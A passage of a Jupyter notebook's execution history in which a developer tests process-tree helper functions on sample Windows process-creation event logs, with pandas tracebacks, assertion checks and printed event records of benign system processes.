\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_getitem_axis\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmaybe_callable\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0maxis\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0maxis\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1425\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1426\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m_is_scalar_access\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mkey\u001b[0m\u001b[1;33m:\u001b[0m \u001b[0mTuple\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\indexing.py\u001b[0m in \u001b[0;36m_getitem_axis\u001b[1;34m(self, key, axis)\u001b[0m\n\u001b[0;32m 1848\u001b[0m \u001b[1;31m# fall thru to straight lookup\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1849\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_validate_key\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0maxis\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1850\u001b[1;33m \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_get_label\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0maxis\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0maxis\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1851\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1852\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\indexing.py\u001b[0m in \u001b[0;36m_get_label\u001b[1;34m(self, label, axis)\u001b[0m\n\u001b[0;32m 158\u001b[0m \u001b[1;32mraise\u001b[0m \u001b[0mIndexingError\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m\"no slices here, handle elsewhere\"\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 159\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 160\u001b[1;33m \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mobj\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_xs\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mlabel\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0maxis\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0maxis\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 161\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 162\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m_get_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mkey\u001b[0m\u001b[1;33m:\u001b[0m \u001b[0mint\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0maxis\u001b[0m\u001b[1;33m:\u001b[0m \u001b[0mint\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\generic.py\u001b[0m in \u001b[0;36mxs\u001b[1;34m(self, key, axis, level, drop_level)\u001b[0m\n\u001b[0;32m 3735\u001b[0m \u001b[0mloc\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mnew_index\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mindex\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc_level\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mdrop_level\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mdrop_level\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 3736\u001b[0m \u001b[1;32melse\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 3737\u001b[1;33m \u001b[0mloc\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mindex\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 3738\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 3739\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0misinstance\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mloc\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mnp\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mndarray\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\indexes\\base.py\u001b[0m in \u001b[0;36mget_loc\u001b[1;34m(self, key, method, tolerance)\u001b[0m\n\u001b[0;32m 2897\u001b[0m \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_engine\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 2898\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mKeyError\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 2899\u001b[1;33m \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_engine\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_maybe_cast_indexer\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 2900\u001b[0m \u001b[0mindexer\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_indexer\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mmethod\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mmethod\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mtolerance\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mtolerance\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 2901\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mindexer\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mndim\u001b[0m \u001b[1;33m>\u001b[0m \u001b[1;36m1\u001b[0m \u001b[1;32mor\u001b[0m \u001b[0mindexer\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0msize\u001b[0m \u001b[1;33m>\u001b[0m \u001b[1;36m1\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32mpandas/_libs/index.pyx\u001b[0m in \u001b[0;36mpandas._libs.index.IndexEngine.get_loc\u001b[1;34m()\u001b[0m\n", "\u001b[1;32mpandas/_libs/index.pyx\u001b[0m in \u001b[0;36mpandas._libs.index.IndexEngine.get_loc\u001b[1;34m()\u001b[0m\n", "\u001b[1;32mpandas/_libs/hashtable_class_helper.pxi\u001b[0m in \u001b[0;36mpandas._libs.hashtable.PyObjectHashTable.get_item\u001b[1;34m()\u001b[0m\n", "\u001b[1;32mpandas/_libs/hashtable_class_helper.pxi\u001b[0m in \u001b[0;36mpandas._libs.hashtable.PyObjectHashTable.get_item\u001b[1;34m()\u001b[0m\n", "\u001b[1;31mKeyError\u001b[0m: '11'" ] } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "ptutil.get_process(p_tree, \"11\")" }, "executionTime": "2019-12-13T20:48:44.242Z" }, { "cell": { "executionCount": 19, "executionEventId": "e2ecfaff-1127-4a28-9513-330ab50691cc", "hasError": false, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "data": { "text/plain": "TenantId 52b1ab41-869e-4138-9e40-2a4457f09bf0\nAccount WORKGROUP\\MSTICAlertsWin1$\nEventID 4688\nTimeGenerated 2019-02-09 21:02:56.273000\nComputer MSTICAlertsWin1\nSubjectUserSid S-1-5-18\nSubjectUserName MSTICAlertsWin1$\nSubjectDomainName WORKGROUP\nSubjectLogonId 0x3e7\nNewProcessId 0x183c\nNewProcessName C:\\Windows\\System32\\conhost.exe\nTokenElevationType %%1936\nProcessId 0x8dc\nCommandLine \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff...\nParentProcessName C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTargetLogonId 0x0\nSourceComputerId 263a788b-6526-4cdc-8ed9-d79402fe4aa0\nTimeCreatedUtc 2019-02-09 21:02:56.273000\nEffectiveLogonId 0x3e7\nnew_process_lc c:\\windows\\system32\\conhost.exe\nparent_proc_lc c:\\program files\\microsoft monitoring agent\\ag...\nsource_index 11\nNewProcessId_par 0x8dc\nEffectiveLogonId_par 0x3e7\nnew_process_lc_par c:\\program files\\microsoft monitoring agent\\ag...\nsource_index_par 998\nProcessId_par 0x864\nNewProcessName_par C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTimeGenerated_orig_par 2019-02-09 21:02:56.256999936\nparent_key c:\\program files\\microsoft monitoring agent\\ag...\nIsRoot False\nIsLeaf True\nIsBranch False\npath 1004/10/11\nparent_index 10\nName: c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.273000, dtype: object" }, "execution_count": 19, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "ptutil.get_process(p_tree, \"c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.273000\")" }, "executionTime": "2019-12-13T20:49:36.248Z" }, { "cell": { "executionCount": 20, "executionEventId": "6f81e08c-2c9d-45f1-99a6-3346fa42b71d", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "Index(['TenantId', 'Account', 'EventID', 'TimeGenerated', 'Computer',\n 'SubjectUserSid', 'SubjectUserName', 'SubjectDomainName',\n 'SubjectLogonId', 'NewProcessId', 'NewProcessName',\n 'TokenElevationType', 'ProcessId', 'CommandLine', 'ParentProcessName',\n 'TargetLogonId', 'SourceComputerId', 'TimeCreatedUtc',\n 'EffectiveLogonId', 'new_process_lc', 'parent_proc_lc', 'source_index',\n 'NewProcessId_par', 'EffectiveLogonId_par', 'new_process_lc_par',\n 'source_index_par', 'ProcessId_par', 'NewProcessName_par',\n 'TimeGenerated_orig_par', 'parent_key', 'IsRoot', 'IsLeaf', 'IsBranch',\n 'path', 'parent_index'],\n dtype='object')" }, "execution_count": 20, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "bottom_desc.index" }, "executionTime": "2019-12-13T20:49:48.682Z" }, { "cell": { "executionCount": 21, "executionEventId": "344c1497-13b1-4cf4-b6a9-041d204f6e76", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "bottom_desc.index.name" }, "executionTime": "2019-12-13T20:49:52.726Z" }, { "cell": { "executionCount": 22, "executionEventId": "070d1f02-0c88-44ee-a678-f1f17f768071", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "'c:\\\\windows\\\\system32\\\\conhost.exe0x183c2019-02-09 21:02:56.273000'" }, "execution_count": 22, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "bottom_desc.name" }, "executionTime": "2019-12-13T20:50:02.613Z" }, { "cell": { "executionCount": 23, "executionEventId": "bf9fa044-1f1d-4e25-a870-4127e948d9aa", "hasError": true, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "ename": "TypeError", "evalue": "get_process() missing 1 required positional argument: 'source'", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mTypeError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mbottom_desc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mbottom\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdesc\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m", "\u001b[1;31mTypeError\u001b[0m: get_process() missing 1 required positional argument: 'source'" ] } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.get_process(bottom_desc.name) == bottom.desc" }, "executionTime": "2019-12-13T20:50:33.997Z" }, { "cell": { "executionCount": 24, "executionEventId": "8d0bf554-c623-42f8-b9e3-9f2d4d603f56", "hasError": true, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "ename": "NameError", "evalue": "name 'bottom' is not defined", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mNameError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mbottom\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdesc\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m", "\u001b[1;31mNameError\u001b[0m: name 'bottom' is not defined" ] } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.get_process(p_tree, bottom_desc.name) == bottom.desc" }, "executionTime": "2019-12-13T20:50:43.632Z" }, { "cell": { "executionCount": 25, "executionEventId": "e459043c-43aa-43db-9918-d5f3ee9a70d6", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "TenantId True\nAccount True\nEventID True\nTimeGenerated True\nComputer True\nSubjectUserSid True\nSubjectUserName True\nSubjectDomainName True\nSubjectLogonId True\nNewProcessId True\nNewProcessName True\nTokenElevationType True\nProcessId True\nCommandLine True\nParentProcessName True\nTargetLogonId True\nSourceComputerId True\nTimeCreatedUtc True\nEffectiveLogonId True\nnew_process_lc True\nparent_proc_lc True\nsource_index True\nNewProcessId_par True\nEffectiveLogonId_par True\nnew_process_lc_par True\nsource_index_par True\nProcessId_par True\nNewProcessName_par True\nTimeGenerated_orig_par True\nparent_key True\nIsRoot True\nIsLeaf True\nIsBranch True\npath True\nparent_index True\nName: c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.273000, dtype: bool" }, "execution_count": 25, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.get_process(p_tree, bottom_desc.name) == bottom_desc" }, "executionTime": "2019-12-13T20:50:49.760Z" }, { "cell": { "executionCount": 26, "executionEventId": "9cb325d3-d9e2-4a2b-a46f-c94570aada5e", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "False" }, "execution_count": 26, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.get_process(p_tree, bottom_desc.name) is bottom_desc" }, "executionTime": "2019-12-13T20:50:53.943Z" }, { "cell": { "executionCount": 27, "executionEventId": "34ecd42b-993f-4ef3-9388-45178e716d91", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "TenantId True\nAccount True\nEventID True\nTimeGenerated True\nComputer True\nSubjectUserSid True\nSubjectUserName True\nSubjectDomainName True\nSubjectLogonId True\nNewProcessId True\nNewProcessName True\nTokenElevationType True\nProcessId True\nCommandLine True\nParentProcessName True\nTargetLogonId True\nSourceComputerId True\nTimeCreatedUtc True\nEffectiveLogonId True\nnew_process_lc True\nparent_proc_lc True\nsource_index True\nNewProcessId_par True\nEffectiveLogonId_par True\nnew_process_lc_par True\nsource_index_par True\nProcessId_par True\nNewProcessName_par True\nTimeGenerated_orig_par True\nparent_key True\nIsRoot True\nIsLeaf True\nIsBranch True\npath True\nparent_index True\nName: c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.273000, dtype: bool" }, "execution_count": 27, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.get_process(p_tree, bottom_desc.name) == bottom_desc" }, "executionTime": "2019-12-13T20:51:08.874Z" }, { "cell": { "executionCount": 28, "executionEventId": "73ada675-2fc1-45ca-8431-8359923f596e", "hasError": true, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "ename": "ValueError", "evalue": "The truth value of a Series is ambiguous. Use a.empty, a.bool(), a.item(), a.any() or a.all().", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mValueError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\generic.py\u001b[0m in \u001b[0;36m__nonzero__\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m 1553\u001b[0m \u001b[1;34m\"The truth value of a {0} is ambiguous. \"\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1554\u001b[0m \"Use a.empty, a.bool(), a.item(), a.any() or a.all().\".format(\n\u001b[1;32m-> 1555\u001b[1;33m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__class__\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__name__\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1556\u001b[0m )\n\u001b[0;32m 1557\u001b[0m )\n", "\u001b[1;31mValueError\u001b[0m: The truth value of a Series is ambiguous. Use a.empty, a.bool(), a.item(), a.any() or a.all()." ] } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "assert ptutil.get_process(p_tree, bottom_desc.name) == bottom_desc" }, "executionTime": "2019-12-13T20:51:18.085Z" }, { "cell": { "executionCount": 29, "executionEventId": "0a70f903-2f48-4b3e-8965-77c95bf4e124", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "assert (ptutil.get_process(p_tree, bottom_desc.name) == bottom_desc).all()" }, "executionTime": "2019-12-13T20:51:50.812Z" }, { "cell": { "executionCount": 30, "executionEventId": "33b96e1c-d936-4649-9181-2449f98dee7a", "hasError": true, "id": "5610ff3a-83b0-4253-92bb-feba160df533", "outputs": [ { "ename": "AssertionError", "evalue": "", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mAssertionError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 11\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_ancestors\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m3\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 12\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 13\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_parent\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m1\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 14\u001b[0m \u001b[1;32massert\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mall\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 15\u001b[0m \u001b[1;32massert\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mall\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mAssertionError\u001b[0m: " ] } ], "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8", "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree, bottom_desc)) == 3\n\nassert len(ptutil.get_parent(p_tree, bottom_desc)) == 1\nassert (ptutil.get_process(p_tree, bottom_desc.name) == bottom_desc).all()\nassert (ptutil.get_process(p_tree, bottom_desc) == bottom_desc).all()\n# ptutil.build_process_key\n# ptutil.infer_schema\n# ptutil.get_root\n# ptutil.get_root_tree\n# ptutil.get_siblings\n# ptutil.get_summary_info" }, "executionTime": "2019-12-13T20:52:13.634Z" }, { "cell": { "executionCount": 31, "executionEventId": "2d965a4c-b0ab-4c6a-9c47-f9d91e9d4906", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "TenantId 52b1ab41-869e-4138-9e40-2a4457f09bf0\nAccount WORKGROUP\\MSTICAlertsWin1$\nEventID 4688\nTimeGenerated 2019-02-09 21:02:56.257000\nComputer MSTICAlertsWin1\nSubjectUserSid S-1-5-18\nSubjectUserName MSTICAlertsWin1$\nSubjectDomainName WORKGROUP\nSubjectLogonId 0x3e7\nNewProcessId 0x8dc\nNewProcessName C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTokenElevationType %%1936\nProcessId 0x864\nCommandLine \"C:\\Program Files\\Microsoft Monitoring Agent\\A...\nParentProcessName C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTargetLogonId 0x0\nSourceComputerId 263a788b-6526-4cdc-8ed9-d79402fe4aa0\nTimeCreatedUtc 2019-02-09 21:02:56.257000\nEffectiveLogonId 0x3e7\nnew_process_lc c:\\program files\\microsoft monitoring agent\\ag...\nparent_proc_lc c:\\program files\\microsoft monitoring agent\\ag...\nsource_index 10\nNewProcessId_par 0x864\nEffectiveLogonId_par 0x3e7\nnew_process_lc_par c:\\program files\\microsoft monitoring agent\\ag...\nsource_index_par NaN\nProcessId_par NaN\nNewProcessName_par NaN\nTimeGenerated_orig_par 1970-01-01 00:00:00\nparent_key c:\\program files\\microsoft monitoring agent\\ag...\nIsRoot False\nIsLeaf False\nIsBranch True\npath 1004/10\nparent_index 1004\nName: c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.257000, dtype: object" }, "execution_count": 31, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.get_parent(p_tree, bottom_desc)" }, "executionTime": "2019-12-13T20:52:35.787Z" }, { "cell": { "executionCount": 32, "executionEventId": "c235ccb0-5529-4118-875d-9be35e4ba4cf", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "(35,)" }, "execution_count": 32, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.get_parent(p_tree, bottom_desc).shape" }, "executionTime": "2019-12-13T20:53:09.559Z" }, { "cell": { "executionCount": 33, "executionEventId": "40aa6e8f-7262-41c3-aae9-cfcea5c12b1c", "hasError": false, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "data": { "text/plain": "True" }, "execution_count": 33, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": 